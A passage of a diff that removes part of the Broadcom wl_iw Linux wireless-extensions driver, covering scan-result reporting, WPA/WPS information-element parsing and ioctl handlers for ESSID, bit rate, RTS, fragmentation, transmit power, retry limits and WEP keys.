--	WL_TRACE(("%s: SIOCSIWSCAN\n", dev->name));
--
--	/* use backup if our thread is not successful */
--	if ((!iscan) || (iscan->sysioc_pid < 0)) {
--		return wl_iw_set_scan(dev, info, wrqu, extra);
--	}
--	if (iscan->iscan_state == ISCAN_STATE_SCANING) {
--		return 0;
--	}
--
--	/* default Broadcast scan */
--	memset(&ssid, 0, sizeof(ssid));
--
--#if WIRELESS_EXT > 17
--	/* check for given essid */
--	if (wrqu->data.length == sizeof(struct iw_scan_req)) {
--		if (wrqu->data.flags & IW_SCAN_THIS_ESSID) {
--			struct iw_scan_req *req = (struct iw_scan_req *)extra;
--			ssid.SSID_len = MIN(sizeof(ssid.SSID), req->essid_len);
--			memcpy(ssid.SSID, req->essid, ssid.SSID_len);
--			ssid.SSID_len = htod32(ssid.SSID_len);
--		}
--	}
--#endif
--
--	iscan->list_cur = iscan->list_hdr;
--	iscan->iscan_state = ISCAN_STATE_SCANING;
--
--
--	wl_iw_set_event_mask(dev);
--	wl_iw_iscan(iscan, &ssid, WL_SCAN_ACTION_START);
--
--	iscan->timer.expires = jiffies + msecs_to_jiffies(iscan->timer_ms);
--	add_timer(&iscan->timer);
--	iscan->timer_on = 1;
--
--	return 0;
--}
--
--#if WIRELESS_EXT > 17
--static bool
--ie_is_wpa_ie(uint8 **wpaie, uint8 **tlvs, int *tlvs_len)
--{
--/* Is this body of this tlvs entry a WPA entry? If */
--/* not update the tlvs buffer pointer/length */
--	uint8 *ie = *wpaie;
--
--	/* If the contents match the WPA_OUI and type=1 */
--	if ((ie[1] >= 6) &&
--		!bcmp((const void *)&ie[2], (const void *)(WPA_OUI "\x01"), 4)) {
--		return TRUE;
--	}
--
--	/* point to the next ie */
--	ie += ie[1] + 2;
--	/* calculate the length of the rest of the buffer */
--	*tlvs_len -= (int)(ie - *tlvs);
--	/* update the pointer to the start of the buffer */
--	*tlvs = ie;
--	return FALSE;
--}
--
--static bool
--ie_is_wps_ie(uint8 **wpsie, uint8 **tlvs, int *tlvs_len)
--{
--/* Is this body of this tlvs entry a WPS entry? If */
--/* not update the tlvs buffer pointer/length */
--	uint8 *ie = *wpsie;
--
--	/* If the contents match the WPA_OUI and type=4 */
--	if ((ie[1] >= 4) &&
--		!bcmp((const void *)&ie[2], (const void *)(WPA_OUI "\x04"), 4)) {
--		return TRUE;
--	}
--
--	/* point to the next ie */
--	ie += ie[1] + 2;
--	/* calculate the length of the rest of the buffer */
--	*tlvs_len -= (int)(ie - *tlvs);
--	/* update the pointer to the start of the buffer */
--	*tlvs = ie;
--	return FALSE;
--}
--#endif /* WIRELESS_EXT > 17 */
--
--
--static int
--wl_iw_handle_scanresults_ies(char **event_p, char *end,
--	struct iw_request_info *info, wl_bss_info_t *bi)
--{
--#if WIRELESS_EXT > 17
--	struct iw_event	iwe;
--	char *event;
--
--	event = *event_p;
--	if (bi->ie_length) {
--		/* look for wpa/rsn ies in the ie list... */
--		bcm_tlv_t *ie;
--		uint8 *ptr = ((uint8 *)bi) + sizeof(wl_bss_info_t);
--		int ptr_len = bi->ie_length;
--
--		/* OSEN IE */
--		if ((ie = bcm_parse_tlvs(ptr, ptr_len, DOT11_MNG_VS_ID)) &&
--			ie->len > WFA_OUI_LEN + 1 &&
--			!bcmp((const void *)&ie->data[0], (const void *)WFA_OUI, WFA_OUI_LEN) &&
--			ie->data[WFA_OUI_LEN] == WFA_OUI_TYPE_OSEN) {
--			iwe.cmd = IWEVGENIE;
--			iwe.u.data.length = ie->len + 2;
--			event = IWE_STREAM_ADD_POINT(info, event, end, &iwe, (char *)ie);
--		}
--		ptr = ((uint8 *)bi) + sizeof(wl_bss_info_t);
--
--		if ((ie = bcm_parse_tlvs(ptr, ptr_len, DOT11_MNG_RSN_ID))) {
--			iwe.cmd = IWEVGENIE;
--			iwe.u.data.length = ie->len + 2;
--			event = IWE_STREAM_ADD_POINT(info, event, end, &iwe, (char *)ie);
--		}
--		ptr = ((uint8 *)bi) + sizeof(wl_bss_info_t);
--
--		if ((ie = bcm_parse_tlvs(ptr, ptr_len, DOT11_MNG_MDIE_ID))) {
--			iwe.cmd = IWEVGENIE;
--			iwe.u.data.length = ie->len + 2;
--			event = IWE_STREAM_ADD_POINT(info, event, end, &iwe, (char *)ie);
--		}
--		ptr = ((uint8 *)bi) + sizeof(wl_bss_info_t);
--
--		while ((ie = bcm_parse_tlvs(ptr, ptr_len, DOT11_MNG_WPA_ID))) {
--			/* look for WPS IE */
--			if (ie_is_wps_ie(((uint8 **)&ie), &ptr, &ptr_len)) {
--				iwe.cmd = IWEVGENIE;
--				iwe.u.data.length = ie->len + 2;
--				event = IWE_STREAM_ADD_POINT(info, event, end, &iwe, (char *)ie);
--				break;
--			}
--		}
--
--		ptr = ((uint8 *)bi) + sizeof(wl_bss_info_t);
--		ptr_len = bi->ie_length;
--		while ((ie = bcm_parse_tlvs(ptr, ptr_len, DOT11_MNG_WPA_ID))) {
--			if (ie_is_wpa_ie(((uint8 **)&ie), &ptr, &ptr_len)) {
--				iwe.cmd = IWEVGENIE;
--				iwe.u.data.length = ie->len + 2;
--				event = IWE_STREAM_ADD_POINT(info, event, end, &iwe, (char *)ie);
--				break;
--			}
--		}
--
--	*event_p = event;
--	}
--
--#endif /* WIRELESS_EXT > 17 */
--	return 0;
--}
--static int
--wl_iw_get_scan(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	struct iw_point *dwrq,
--	char *extra
--)
--{
--	channel_info_t ci;
--	wl_scan_results_t *list;
--	struct iw_event	iwe;
--	wl_bss_info_t *bi = NULL;
--	int error, i, j;
--	char *event = extra, *end = extra + dwrq->length, *value;
--	uint buflen = dwrq->length;
--
--	WL_TRACE(("%s: SIOCGIWSCAN\n", dev->name));
--
--	if (!extra)
--		return -EINVAL;
--
--	/* Check for scan in progress */
--	if ((error = dev_wlc_ioctl(dev, WLC_GET_CHANNEL, &ci, sizeof(ci))))
--		return error;
--	ci.scan_channel = dtoh32(ci.scan_channel);
--	if (ci.scan_channel)
--		return -EAGAIN;
--
--	/* Get scan results (too large to put on the stack) */
--	list = kmalloc(buflen, GFP_KERNEL);
--	if (!list)
--		return -ENOMEM;
--	memset(list, 0, buflen);
--	list->buflen = htod32(buflen);
--	if ((error = dev_wlc_ioctl(dev, WLC_SCAN_RESULTS, list, buflen))) {
--		kfree(list);
--		return error;
--	}
--	list->buflen = dtoh32(list->buflen);
--	list->version = dtoh32(list->version);
--	list->count = dtoh32(list->count);
--
--	for (i = 0; i < list->count && i < IW_MAX_AP; i++) {
--		bi = bi ? (wl_bss_info_t *)((uintptr)bi + dtoh32(bi->length)) : list->bss_info;
--
--		/* First entry must be the BSSID */
--		iwe.cmd = SIOCGIWAP;
--		iwe.u.ap_addr.sa_family = ARPHRD_ETHER;
--		memcpy(iwe.u.ap_addr.sa_data, &bi->BSSID, ETHER_ADDR_LEN);
--		event = IWE_STREAM_ADD_EVENT(info, event, end, &iwe, IW_EV_ADDR_LEN);
--
--		/* SSID */
--		iwe.u.data.length = dtoh32(bi->SSID_len);
--		iwe.cmd = SIOCGIWESSID;
--		iwe.u.data.flags = 1;
--		event = IWE_STREAM_ADD_POINT(info, event, end, &iwe, bi->SSID);
--
--		/* Mode */
--		if (dtoh16(bi->capability) & (DOT11_CAP_ESS | DOT11_CAP_IBSS)) {
--			iwe.cmd = SIOCGIWMODE;
--			if (dtoh16(bi->capability) & DOT11_CAP_ESS)
--				iwe.u.mode = IW_MODE_INFRA;
--			else
--				iwe.u.mode = IW_MODE_ADHOC;
--			event = IWE_STREAM_ADD_EVENT(info, event, end, &iwe, IW_EV_UINT_LEN);
--		}
--
--		/* Channel */
--		iwe.cmd = SIOCGIWFREQ;
--
--		iwe.u.freq.m = wf_channel2mhz(CHSPEC_CHANNEL(bi->chanspec),
--			(CHSPEC_IS2G(bi->chanspec)) ?
--			WF_CHAN_FACTOR_2_4_G : WF_CHAN_FACTOR_5_G);
--		iwe.u.freq.e = 6;
--		event = IWE_STREAM_ADD_EVENT(info, event, end, &iwe, IW_EV_FREQ_LEN);
--
--		/* Channel quality */
--		iwe.cmd = IWEVQUAL;
--		iwe.u.qual.qual = rssi_to_qual(dtoh16(bi->RSSI));
--		iwe.u.qual.level = 0x100 + dtoh16(bi->RSSI);
--		iwe.u.qual.noise = 0x100 + bi->phy_noise;
--		event = IWE_STREAM_ADD_EVENT(info, event, end, &iwe, IW_EV_QUAL_LEN);
--
--		/* WPA, WPA2, WPS, WAPI IEs */
--		 wl_iw_handle_scanresults_ies(&event, end, info, bi);
--
--		/* Encryption */
--		iwe.cmd = SIOCGIWENCODE;
--		if (dtoh16(bi->capability) & DOT11_CAP_PRIVACY)
--			iwe.u.data.flags = IW_ENCODE_ENABLED | IW_ENCODE_NOKEY;
--		else
--			iwe.u.data.flags = IW_ENCODE_DISABLED;
--		iwe.u.data.length = 0;
--		event = IWE_STREAM_ADD_POINT(info, event, end, &iwe, (char *)event);
--
--		/* Rates */
--		if (bi->rateset.count) {
--			value = event + IW_EV_LCP_LEN;
--			iwe.cmd = SIOCGIWRATE;
--			/* Those two flags are ignored... */
--			iwe.u.bitrate.fixed = iwe.u.bitrate.disabled = 0;
--			for (j = 0; j < bi->rateset.count && j < IW_MAX_BITRATES; j++) {
--				iwe.u.bitrate.value = (bi->rateset.rates[j] & 0x7f) * 500000;
--				value = IWE_STREAM_ADD_VALUE(info, event, value, end, &iwe,
--					IW_EV_PARAM_LEN);
--			}
--			event = value;
--		}
--	}
--
--	kfree(list);
--
--	dwrq->length = event - extra;
--	dwrq->flags = 0;	/* todo */
--
--	return 0;
--}
--
--static int
--wl_iw_iscan_get_scan(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	struct iw_point *dwrq,
--	char *extra
--)
--{
--	wl_scan_results_t *list;
--	struct iw_event	iwe;
--	wl_bss_info_t *bi = NULL;
--	int ii, j;
--	int apcnt;
--	char *event = extra, *end = extra + dwrq->length, *value;
--	iscan_info_t *iscan = g_iscan;
--	iscan_buf_t * p_buf;
--
--	WL_TRACE(("%s: SIOCGIWSCAN\n", dev->name));
--
--	if (!extra)
--		return -EINVAL;
--
--	/* use backup if our thread is not successful */
--	if ((!iscan) || (iscan->sysioc_pid < 0)) {
--		return wl_iw_get_scan(dev, info, dwrq, extra);
--	}
--
--	/* Check for scan in progress */
--	if (iscan->iscan_state == ISCAN_STATE_SCANING)
--		return -EAGAIN;
--
--	apcnt = 0;
--	p_buf = iscan->list_hdr;
--	/* Get scan results */
--	while (p_buf != iscan->list_cur) {
--	    list = &((wl_iscan_results_t*)p_buf->iscan_buf)->results;
--
--	    if (list->version != WL_BSS_INFO_VERSION) {
--		WL_ERROR(("list->version %d != WL_BSS_INFO_VERSION\n", list->version));
--	    }
--
--	    bi = NULL;
--	    for (ii = 0; ii < list->count && apcnt < IW_MAX_AP; apcnt++, ii++) {
--		bi = bi ? (wl_bss_info_t *)((uintptr)bi + dtoh32(bi->length)) : list->bss_info;
--
--		/* overflow check cover fields before wpa IEs */
--		if (event + ETHER_ADDR_LEN + bi->SSID_len + IW_EV_UINT_LEN + IW_EV_FREQ_LEN +
--			IW_EV_QUAL_LEN >= end)
--			return -E2BIG;
--		/* First entry must be the BSSID */
--		iwe.cmd = SIOCGIWAP;
--		iwe.u.ap_addr.sa_family = ARPHRD_ETHER;
--		memcpy(iwe.u.ap_addr.sa_data, &bi->BSSID, ETHER_ADDR_LEN);
--		event = IWE_STREAM_ADD_EVENT(info, event, end, &iwe, IW_EV_ADDR_LEN);
--
--		/* SSID */
--		iwe.u.data.length = dtoh32(bi->SSID_len);
--		iwe.cmd = SIOCGIWESSID;
--		iwe.u.data.flags = 1;
--		event = IWE_STREAM_ADD_POINT(info, event, end, &iwe, bi->SSID);
--
--		/* Mode */
--		if (dtoh16(bi->capability) & (DOT11_CAP_ESS | DOT11_CAP_IBSS)) {
--			iwe.cmd = SIOCGIWMODE;
--			if (dtoh16(bi->capability) & DOT11_CAP_ESS)
--				iwe.u.mode = IW_MODE_INFRA;
--			else
--				iwe.u.mode = IW_MODE_ADHOC;
--			event = IWE_STREAM_ADD_EVENT(info, event, end, &iwe, IW_EV_UINT_LEN);
--		}
--
--		/* Channel */
--		iwe.cmd = SIOCGIWFREQ;
--
--		iwe.u.freq.m = wf_channel2mhz(CHSPEC_CHANNEL(bi->chanspec),
--			(CHSPEC_IS2G(bi->chanspec)) ?
--			WF_CHAN_FACTOR_2_4_G : WF_CHAN_FACTOR_5_G);
--		iwe.u.freq.e = 6;
--		event = IWE_STREAM_ADD_EVENT(info, event, end, &iwe, IW_EV_FREQ_LEN);
--
--		/* Channel quality */
--		iwe.cmd = IWEVQUAL;
--		iwe.u.qual.qual = rssi_to_qual(dtoh16(bi->RSSI));
--		iwe.u.qual.level = 0x100 + dtoh16(bi->RSSI);
--		iwe.u.qual.noise = 0x100 + bi->phy_noise;
--		event = IWE_STREAM_ADD_EVENT(info, event, end, &iwe, IW_EV_QUAL_LEN);
--
--		/* WPA, WPA2, WPS, WAPI IEs */
--		wl_iw_handle_scanresults_ies(&event, end, info, bi);
--
--		/* Encryption */
--		iwe.cmd = SIOCGIWENCODE;
--		if (dtoh16(bi->capability) & DOT11_CAP_PRIVACY)
--			iwe.u.data.flags = IW_ENCODE_ENABLED | IW_ENCODE_NOKEY;
--		else
--			iwe.u.data.flags = IW_ENCODE_DISABLED;
--		iwe.u.data.length = 0;
--		event = IWE_STREAM_ADD_POINT(info, event, end, &iwe, (char *)event);
--
--		/* Rates */
--		if (bi->rateset.count <= sizeof(bi->rateset.rates)) {
--			if (event + IW_MAX_BITRATES*IW_EV_PARAM_LEN >= end)
--				return -E2BIG;
--
--			value = event + IW_EV_LCP_LEN;
--			iwe.cmd = SIOCGIWRATE;
--			/* Those two flags are ignored... */
--			iwe.u.bitrate.fixed = iwe.u.bitrate.disabled = 0;
--			for (j = 0; j < bi->rateset.count && j < IW_MAX_BITRATES; j++) {
--				iwe.u.bitrate.value = (bi->rateset.rates[j] & 0x7f) * 500000;
--				value = IWE_STREAM_ADD_VALUE(info, event, value, end, &iwe,
--					IW_EV_PARAM_LEN);
--			}
--			event = value;
--		}
--	    }
--	    p_buf = p_buf->next;
--	} /* while (p_buf) */
--
--	dwrq->length = event - extra;
--	dwrq->flags = 0;	/* todo */
--
--	return 0;
--}
--
--#endif /* WIRELESS_EXT > 13 */
--
--
--static int
--wl_iw_set_essid(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	struct iw_point *dwrq,
--	char *extra
--)
--{
--	wlc_ssid_t ssid;
--	int error;
--
--	WL_TRACE(("%s: SIOCSIWESSID\n", dev->name));
--
--	/* default Broadcast SSID */
--	memset(&ssid, 0, sizeof(ssid));
--	if (dwrq->length && extra) {
--#if WIRELESS_EXT > 20
--		ssid.SSID_len = MIN(sizeof(ssid.SSID), dwrq->length);
--#else
--		ssid.SSID_len = MIN(sizeof(ssid.SSID), dwrq->length-1);
--#endif
--		memcpy(ssid.SSID, extra, ssid.SSID_len);
--		ssid.SSID_len = htod32(ssid.SSID_len);
--
--		if ((error = dev_wlc_ioctl(dev, WLC_SET_SSID, &ssid, sizeof(ssid))))
--			return error;
--	}
--	/* If essid null then it is "iwconfig <interface> essid off" command */
--	else {
--		scb_val_t scbval;
--		bzero(&scbval, sizeof(scb_val_t));
--		if ((error = dev_wlc_ioctl(dev, WLC_DISASSOC, &scbval, sizeof(scb_val_t))))
--			return error;
--	}
--	return 0;
--}
--
--static int
--wl_iw_get_essid(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	struct iw_point *dwrq,
--	char *extra
--)
--{
--	wlc_ssid_t ssid;
--	int error;
--
--	WL_TRACE(("%s: SIOCGIWESSID\n", dev->name));
--
--	if (!extra)
--		return -EINVAL;
--
--	if ((error = dev_wlc_ioctl(dev, WLC_GET_SSID, &ssid, sizeof(ssid)))) {
--		WL_ERROR(("Error getting the SSID\n"));
--		return error;
--	}
--
--	ssid.SSID_len = dtoh32(ssid.SSID_len);
--
--	/* Get the current SSID */
--	memcpy(extra, ssid.SSID, ssid.SSID_len);
--
--	dwrq->length = ssid.SSID_len;
--
--	dwrq->flags = 1; /* active */
--
--	return 0;
--}
--
--static int
--wl_iw_set_nick(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	struct iw_point *dwrq,
--	char *extra
--)
--{
--	wl_iw_t *iw = IW_DEV_IF(dev);
--	WL_TRACE(("%s: SIOCSIWNICKN\n", dev->name));
--
--	if (!extra)
--		return -EINVAL;
--
--	/* Check the size of the string */
--	if (dwrq->length > sizeof(iw->nickname))
--		return -E2BIG;
--
--	memcpy(iw->nickname, extra, dwrq->length);
--	iw->nickname[dwrq->length - 1] = '\0';
--
--	return 0;
--}
--
--static int
--wl_iw_get_nick(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	struct iw_point *dwrq,
--	char *extra
--)
--{
--	wl_iw_t *iw = IW_DEV_IF(dev);
--	WL_TRACE(("%s: SIOCGIWNICKN\n", dev->name));
--
--	if (!extra)
--		return -EINVAL;
--
--	strcpy(extra, iw->nickname);
--	dwrq->length = strlen(extra) + 1;
--
--	return 0;
--}
--
--static int wl_iw_set_rate(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	struct iw_param *vwrq,
--	char *extra
--)
--{
--	wl_rateset_t rateset;
--	int error, rate, i, error_bg, error_a;
--
--	WL_TRACE(("%s: SIOCSIWRATE\n", dev->name));
--
--	/* Get current rateset */
--	if ((error = dev_wlc_ioctl(dev, WLC_GET_CURR_RATESET, &rateset, sizeof(rateset))))
--		return error;
--
--	rateset.count = dtoh32(rateset.count);
--
--	if (vwrq->value < 0) {
--		/* Select maximum rate */
--		rate = rateset.rates[rateset.count - 1] & 0x7f;
--	} else if (vwrq->value < rateset.count) {
--		/* Select rate by rateset index */
--		rate = rateset.rates[vwrq->value] & 0x7f;
--	} else {
--		/* Specified rate in bps */
--		rate = vwrq->value / 500000;
--	}
--
--	if (vwrq->fixed) {
--		/*
--			Set rate override,
--			Since the is a/b/g-blind, both a/bg_rate are enforced.
--		*/
--		error_bg = dev_wlc_intvar_set(dev, "bg_rate", rate);
--		error_a = dev_wlc_intvar_set(dev, "a_rate", rate);
--
--		if (error_bg && error_a)
--			return (error_bg | error_a);
--	} else {
--		/*
--			clear rate override
--			Since the is a/b/g-blind, both a/bg_rate are enforced.
--		*/
--		/* 0 is for clearing rate override */
--		error_bg = dev_wlc_intvar_set(dev, "bg_rate", 0);
--		/* 0 is for clearing rate override */
--		error_a = dev_wlc_intvar_set(dev, "a_rate", 0);
--
--		if (error_bg && error_a)
--			return (error_bg | error_a);
--
--		/* Remove rates above selected rate */
--		for (i = 0; i < rateset.count; i++)
--			if ((rateset.rates[i] & 0x7f) > rate)
--				break;
--		rateset.count = htod32(i);
--
--		/* Set current rateset */
--		if ((error = dev_wlc_ioctl(dev, WLC_SET_RATESET, &rateset, sizeof(rateset))))
--			return error;
--	}
--
--	return 0;
--}
--
--static int wl_iw_get_rate(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	struct iw_param *vwrq,
--	char *extra
--)
--{
--	int error, rate;
--
--	WL_TRACE(("%s: SIOCGIWRATE\n", dev->name));
--
--	/* Report the current tx rate */
--	if ((error = dev_wlc_ioctl(dev, WLC_GET_RATE, &rate, sizeof(rate))))
--		return error;
--	rate = dtoh32(rate);
--	vwrq->value = rate * 500000;
--
--	return 0;
--}
--
--static int
--wl_iw_set_rts(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	struct iw_param *vwrq,
--	char *extra
--)
--{
--	int error, rts;
--
--	WL_TRACE(("%s: SIOCSIWRTS\n", dev->name));
--
--	if (vwrq->disabled)
--		rts = DOT11_DEFAULT_RTS_LEN;
--	else if (vwrq->value < 0 || vwrq->value > DOT11_DEFAULT_RTS_LEN)
--		return -EINVAL;
--	else
--		rts = vwrq->value;
--
--	if ((error = dev_wlc_intvar_set(dev, "rtsthresh", rts)))
--		return error;
--
--	return 0;
--}
--
--static int
--wl_iw_get_rts(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	struct iw_param *vwrq,
--	char *extra
--)
--{
--	int error, rts;
--
--	WL_TRACE(("%s: SIOCGIWRTS\n", dev->name));
--
--	if ((error = dev_wlc_intvar_get(dev, "rtsthresh", &rts)))
--		return error;
--
--	vwrq->value = rts;
--	vwrq->disabled = (rts >= DOT11_DEFAULT_RTS_LEN);
--	vwrq->fixed = 1;
--
--	return 0;
--}
--
--static int
--wl_iw_set_frag(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	struct iw_param *vwrq,
--	char *extra
--)
--{
--	int error, frag;
--
--	WL_TRACE(("%s: SIOCSIWFRAG\n", dev->name));
--
--	if (vwrq->disabled)
--		frag = DOT11_DEFAULT_FRAG_LEN;
--	else if (vwrq->value < 0 || vwrq->value > DOT11_DEFAULT_FRAG_LEN)
--		return -EINVAL;
--	else
--		frag = vwrq->value;
--
--	if ((error = dev_wlc_intvar_set(dev, "fragthresh", frag)))
--		return error;
--
--	return 0;
--}
--
--static int
--wl_iw_get_frag(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	struct iw_param *vwrq,
--	char *extra
--)
--{
--	int error, fragthreshold;
--
--	WL_TRACE(("%s: SIOCGIWFRAG\n", dev->name));
--
--	if ((error = dev_wlc_intvar_get(dev, "fragthresh", &fragthreshold)))
--		return error;
--
--	vwrq->value = fragthreshold;
--	vwrq->disabled = (fragthreshold >= DOT11_DEFAULT_FRAG_LEN);
--	vwrq->fixed = 1;
--
--	return 0;
--}
--
--static int
--wl_iw_set_txpow(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	struct iw_param *vwrq,
--	char *extra
--)
--{
--	int error, disable;
--	uint16 txpwrmw;
--	WL_TRACE(("%s: SIOCSIWTXPOW\n", dev->name));
--
--	/* Make sure radio is off or on as far as software is concerned */
--	disable = vwrq->disabled ? WL_RADIO_SW_DISABLE : 0;
--	disable += WL_RADIO_SW_DISABLE << 16;
--
--	disable = htod32(disable);
--	if ((error = dev_wlc_ioctl(dev, WLC_SET_RADIO, &disable, sizeof(disable))))
--		return error;
--
--	/* If Radio is off, nothing more to do */
--	if (disable & WL_RADIO_SW_DISABLE)
--		return 0;
--
--	/* Only handle mW */
--	if (!(vwrq->flags & IW_TXPOW_MWATT))
--		return -EINVAL;
--
--	/* Value < 0 means just "on" or "off" */
--	if (vwrq->value < 0)
--		return 0;
--
--	if (vwrq->value > 0xffff) txpwrmw = 0xffff;
--	else txpwrmw = (uint16)vwrq->value;
--
--
--	error = dev_wlc_intvar_set(dev, "qtxpower", (int)(bcm_mw_to_qdbm(txpwrmw)));
--	return error;
--}
--
--static int
--wl_iw_get_txpow(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	struct iw_param *vwrq,
--	char *extra
--)
--{
--	int error, disable, txpwrdbm;
--	uint8 result;
--
--	WL_TRACE(("%s: SIOCGIWTXPOW\n", dev->name));
--
--	if ((error = dev_wlc_ioctl(dev, WLC_GET_RADIO, &disable, sizeof(disable))) ||
--	    (error = dev_wlc_intvar_get(dev, "qtxpower", &txpwrdbm)))
--		return error;
--
--	disable = dtoh32(disable);
--	result = (uint8)(txpwrdbm & ~WL_TXPWR_OVERRIDE);
--	vwrq->value = (int32)bcm_qdbm_to_mw(result);
--	vwrq->fixed = 0;
--	vwrq->disabled = (disable & (WL_RADIO_SW_DISABLE | WL_RADIO_HW_DISABLE)) ? 1 : 0;
--	vwrq->flags = IW_TXPOW_MWATT;
--
--	return 0;
--}
--
--#if WIRELESS_EXT > 10
--static int
--wl_iw_set_retry(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	struct iw_param *vwrq,
--	char *extra
--)
--{
--	int error, lrl, srl;
--
--	WL_TRACE(("%s: SIOCSIWRETRY\n", dev->name));
--
--	/* Do not handle "off" or "lifetime" */
--	if (vwrq->disabled || (vwrq->flags & IW_RETRY_LIFETIME))
--		return -EINVAL;
--
--	/* Handle "[min|max] limit" */
--	if (vwrq->flags & IW_RETRY_LIMIT) {
--		/* "max limit" or just "limit" */
--#if WIRELESS_EXT > 20
--		if ((vwrq->flags & IW_RETRY_LONG) ||(vwrq->flags & IW_RETRY_MAX) ||
--			!((vwrq->flags & IW_RETRY_SHORT) || (vwrq->flags & IW_RETRY_MIN))) {
--#else
--		if ((vwrq->flags & IW_RETRY_MAX) || !(vwrq->flags & IW_RETRY_MIN)) {
--#endif /* WIRELESS_EXT > 20 */
--
--			lrl = htod32(vwrq->value);
--			if ((error = dev_wlc_ioctl(dev, WLC_SET_LRL, &lrl, sizeof(lrl))))
--				return error;
--		}
--		/* "min limit" or just "limit" */
--#if WIRELESS_EXT > 20
--		if ((vwrq->flags & IW_RETRY_SHORT) ||(vwrq->flags & IW_RETRY_MIN) ||
--			!((vwrq->flags & IW_RETRY_LONG) || (vwrq->flags & IW_RETRY_MAX))) {
--#else
--		if ((vwrq->flags & IW_RETRY_MIN) || !(vwrq->flags & IW_RETRY_MAX)) {
--#endif /* WIRELESS_EXT > 20 */
--
--			srl = htod32(vwrq->value);
--			if ((error = dev_wlc_ioctl(dev, WLC_SET_SRL, &srl, sizeof(srl))))
--				return error;
--		}
--	}
--
--	return 0;
--}
--
--static int
--wl_iw_get_retry(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	struct iw_param *vwrq,
--	char *extra
--)
--{
--	int error, lrl, srl;
--
--	WL_TRACE(("%s: SIOCGIWRETRY\n", dev->name));
--
--	vwrq->disabled = 0;      /* Can't be disabled */
--
--	/* Do not handle lifetime queries */
--	if ((vwrq->flags & IW_RETRY_TYPE) == IW_RETRY_LIFETIME)
--		return -EINVAL;
--
--	/* Get retry limits */
--	if ((error = dev_wlc_ioctl(dev, WLC_GET_LRL, &lrl, sizeof(lrl))) ||
--	    (error = dev_wlc_ioctl(dev, WLC_GET_SRL, &srl, sizeof(srl))))
--		return error;
--
--	lrl = dtoh32(lrl);
--	srl = dtoh32(srl);
--
--	/* Note : by default, display the min retry number */
--	if (vwrq->flags & IW_RETRY_MAX) {
--		vwrq->flags = IW_RETRY_LIMIT | IW_RETRY_MAX;
--		vwrq->value = lrl;
--	} else {
--		vwrq->flags = IW_RETRY_LIMIT;
--		vwrq->value = srl;
--		if (srl != lrl)
--			vwrq->flags |= IW_RETRY_MIN;
--	}
--
--	return 0;
--}
--#endif /* WIRELESS_EXT > 10 */
--
--static int
--wl_iw_set_encode(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	struct iw_point *dwrq,
--	char *extra
--)
--{
--	wl_wsec_key_t key;
--	int error, val, wsec;
--
--	WL_TRACE(("%s: SIOCSIWENCODE\n", dev->name));
--
--	memset(&key, 0, sizeof(key));
--
--	if ((dwrq->flags & IW_ENCODE_INDEX) == 0) {
--		/* Find the current key */
--		for (key.index = 0; key.index < DOT11_MAX_DEFAULT_KEYS; key.index++) {
--			val = htod32(key.index);
--			if ((error = dev_wlc_ioctl(dev, WLC_GET_KEY_PRIMARY, &val, sizeof(val))))
--				return error;
--			val = dtoh32(val);
--			if (val)
--				break;
--		}
--		/* Default to 0 */
--		if (key.index == DOT11_MAX_DEFAULT_KEYS)
--			key.index = 0;
--	} else {
--		key.index = (dwrq->flags & IW_ENCODE_INDEX) - 1;
--		if (key.index >= DOT11_MAX_DEFAULT_KEYS)
--			return -EINVAL;
--	}
--
--	/* Interpret "off" to mean no encryption */
--	wsec = (dwrq->flags & IW_ENCODE_DISABLED) ? 0 : WEP_ENABLED;
--
--	if ((error = dev_wlc_intvar_set(dev, "wsec", wsec)))
--		return error;
--
--	/* Old API used to pass a NULL pointer instead of IW_ENCODE_NOKEY */
--	if (!extra || !dwrq->length || (dwrq->flags & IW_ENCODE_NOKEY)) {
--		/* Just select a new current key */
--		val = htod32(key.index);
--		if ((error = dev_wlc_ioctl(dev, WLC_SET_KEY_PRIMARY, &val, sizeof(val))))
--			return error;
--	} else {
--		key.len = dwrq->length;
--
--		if (dwrq->length > sizeof(key.data))
--			return -EINVAL;
--
--		memcpy(key.data, extra, dwrq->length);
--
--		key.flags = WL_PRIMARY_KEY;
--		switch (key.len) {
--		case WEP1_KEY_SIZE:
--			key.algo = CRYPTO_ALGO_WEP1;
--			break;
--		case WEP128_KEY_SIZE:
--			key.algo = CRYPTO_ALGO_WEP128;
--			break;
--#if LINUX_VERSION_CODE >= KERNEL_VERSION(2, 6, 14)
--		case TKIP_KEY_SIZE:
--			key.algo = CRYPTO_ALGO_TKIP;
--			break;
--#endif
--		case AES_KEY_SIZE:
--			key.algo = CRYPTO_ALGO_AES_CCM;
--			break;
--		default:
--			return -EINVAL;
--		}
--
--		/* Set the new key/index */
--		swap_key_from_BE(&key);
--		if ((error = dev_wlc_ioctl(dev, WLC_SET_KEY, &key, sizeof(key))))
--			return error;
--	}
--
--	/* Interpret "restricted" to mean shared key authentication */
--	val = (dwrq->flags & IW_ENCODE_RESTRICTED) ? 1 : 0;
--	val = htod32(val);
--	if ((error = dev_wlc_ioctl(dev, WLC_SET_AUTH, &val, sizeof(val))))
--		return error;
--
--	return 0;
--}
--
--static int
--wl_iw_get_encode(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	struct iw_point *dwrq,
--	char *extra
--)
--{
--	wl_wsec_key_t key;
--	int error, val, wsec, auth;
--
--	WL_TRACE(("%s: SIOCGIWENCODE\n", dev->name));
--
--	/* assure default values of zero for things we don't touch */
--	bzero(&key, sizeof(wl_wsec_key_t));
--
--	if ((dwrq->flags & IW_ENCODE_INDEX) == 0) {
--		/* Find the current key */
--		for (key.index = 0; key.index < DOT11_MAX_DEFAULT_KEYS; key.index++) {
--			val = key.index;
